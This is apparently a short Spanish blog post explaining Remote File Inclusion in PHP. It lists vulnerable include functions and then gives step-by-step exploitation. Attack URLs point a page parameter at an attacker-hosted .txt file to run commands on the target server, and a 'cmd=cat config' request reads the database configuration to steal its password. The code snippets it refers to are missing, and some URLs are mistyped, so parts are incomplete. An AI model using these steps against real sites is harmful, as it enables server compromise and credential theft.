Que es Remoto file inclusión (RFI) ?
Remote file inclusión (Inclusión remota de archivo) esta vulnerabilidad que permite el enlace de
archivos remotos situados en otros servidores a causa de una mala programación de la página
que contiene la función include ().
Algunas funciones vulnerables a RFI son:
Include ()
Include_once ()
require ()
require_once ()
Por ejemplo:
En una parte del index.php esta este code:
Lo que hace este code es incluir archivos remotamente mediante la variable
$f.
www.pagina.com/index.php?f=caciones.php
Lo que esta haciendo es incluyendo archives mediante la variable f.
Entonces se explotaría de la siguiente forma:
www.pagina.com/index.php?f=http://tupagina.com/archivo.txt?
Bueno Recuerde que su code tiene que estar en extensión .txt .gif. .jpg etc.... menos en php
porque se ejecutaría en nuestro servidor.
Entonces creamos un archivo con extensión .txt y le ponemos el code que se ejecutaría en su
servidor, bueno en este caso yo le pondré este:
Que sirve para ejecutar comandos en el servidor y se explotaría de la siguiente manera:
www.pagina.com/index.php?page=http//www.tupafina.com/archivo.txt?cmd=cat
config
Lo que estaría viendo la configuración de la BD y poder sacar el password de la BD.
Publicar un comentario